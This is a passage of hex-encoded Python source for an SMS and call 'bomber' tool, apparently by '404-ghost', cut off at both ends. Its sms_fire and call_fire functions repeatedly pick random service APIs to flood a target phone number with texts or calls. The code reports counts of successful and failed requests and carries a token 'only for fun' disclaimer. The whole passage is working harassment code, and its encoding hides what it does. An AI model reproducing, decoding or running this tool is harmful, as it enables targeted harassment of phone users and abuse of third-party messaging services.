x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x53\x4d\x53\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x32\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x43\x61\x6c\x6c\x73\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x43\x61\x6c\x6c\x73\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x69\x73\x20\x4e\x6f\x74\x20\x53\x75\x70\x70\x6f\x72\x74\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x50\x6c\x65\x61\x73\x65\x20\x53\x65\x6e\x64\x20\x41\x20\x4d\x61\x69\x6c\x20\x54\x6f\x20\x68\x61\x73\x61\x6e\x66\x69\x72\x6e\x61\x73\x32\x34\x32\x40\x67\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x20\x54\x6f\x20\x4c\x65\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x61\x70\x69\x20\x3d\x20\x31\x30\x33\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x21\x20\x41\x6c\x6c\x20\x41\x50\x49\x73\x20\x48\x61\x76\x65\x20\x45\x78\x70\x69\x72\x65\x64\x20\x50\x6c\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x20\x42\x6f\x6d\x62\x20\x4f\x72\x20\x52\x75\x6e\x20\x49\x74\x20\x41\x67\x61\x69\x6e\x2e\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x57\x65\x20\x41\x72\x65\x20\x53\x6f\x72\x72\x79\x20\x54\x6f\x20\x53\x61\x79\x20\x54\x68\x61\x74\x20\x42\x6f\x6d\x62\x69\x6e\x67\x20\x4c\x69\x6d\x69\x74\x20\x46\x6f\x72\x20\x59\x6f\x75\x72\x20\x43\x6f\x75\x6e\x74\x72\x79\x20\x48\x61\x73\x20\x42\x65\x65\x6e\x20\x52\x65\x61\x63\x68\x65\x64\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x57\x65\x20\x41\x72\x65\x20\x57\x6f\x72\x6b\x69\x6e\x67\x20\x54\x6f\x6f\x20\x48\x61\x72\x64\x20\x54\x6f\x20\x49\x6e\x63\x72\x65\x61\x73\x65\x20\x54\x68\x65\x20\x49\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x20\x4c\x69\x6d\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x54\x68\x69\x73\x20\x77\x69\x6c\x6c\x20\x68\x65\x6c\x70\x20\x75\x73\x20\x74\x6f\x20\x67\x69\x76\x65\x20\x73\x75\x70\x70\x6f\x72\x74\x20\x74\x6f\x20\x79\x6f\x75\x72\x20\x63\x6f\x75\x6e\x74\x72\x79\x20\x66\x61\x73\x74\x2e\x2e\x2e\x5c\x6e\x5c\x6e\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x2